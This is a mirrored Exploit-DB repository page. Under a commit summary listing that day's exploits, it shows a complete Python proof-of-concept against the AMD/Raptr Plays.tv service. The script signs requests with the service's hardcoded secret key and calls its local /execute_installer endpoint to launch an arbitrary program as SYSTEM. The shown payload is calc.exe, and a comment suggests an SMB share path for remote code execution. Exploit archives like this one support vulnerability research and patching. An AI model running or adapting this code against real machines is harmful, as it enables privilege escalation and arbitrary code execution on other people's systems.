bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/44476.py
Offensive Security d0cba5625f DB: 2018-04-18 
12 changes to exploits/shellcodes

Brave Browser < 0.13.0 -  'long alert() argument' Denial of Service
Brave Browser < 0.13.0 -  'window.close(self)' Denial of Service
AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution
Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)
D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)

Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
Drupal  < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)

Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution

Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
2018-04-18 05:01:47 +00:00

88 lines
No EOL
2.6 KiB
Python
Executable file
Raw Blame History

########################################################################
# http://support.amd.com/en-us/download?cmpid=CCCOffline -
# Click "Automatically Detect - Download Now"
# Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
# OR
#
# https://plays.tv/download
#
# Target OS: Windows( Any )
# Privilege: SYSTEM
# Type: Arbitrary File Execution
#
# Notes: Second minor bug allows for arbitrary file write of
# uncontrolled data using the /extract_files path.
#
########################################################################
#!/usr/bin/python3
import urllib.request
import json
import hashlib
def check_svc( path, data ):
#Setup request
request = urllib.request.Request(addr)
#add post data
try:
resp = urllib.request.urlopen(request, "data".encode("utf-8"))
return "[-] Not Raptr, Plays TV service"
except urllib.error.HTTPError as err:
error_message = err.read().decode("utf-8")
if error_message == 'Security failed - Missing hash or message[data]':
return "[+] Raptr, Plays TV service"
def post_req( path, data ):
secret_key = 'a%qs0t33QgiE6ut^0I&Y'
#Setup request
request = urllib.request.Request(addr)
json_data = json.dumps(data)
m = hashlib.md5()
hash_data = path + json_data + secret_key
m.update(hash_data.encode('utf8'))
hash_str = m.hexdigest()
#add post data
p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
resp = urllib.request.urlopen(request, p_data)
return resp.read()
#Target IP address
ip = '127.0.0.1'
##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
##############################################################
port = 50452
##############################################################
# The service calls CreateProcess with the following format:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution
data = {
"installer": cmd,
"appdata": cmd
}
#Set url
path = '/execute_installer'
addr = 'http://' + ip + ':' + str(port) + path
#Check if the remote service is a Raptr Plays TV svc
#ret = check_svc(data, path)
#print(ret)
#Exploit service
ret = post_req(path, data)
print(ret)
Reference in a new issue View git blame Copy permalink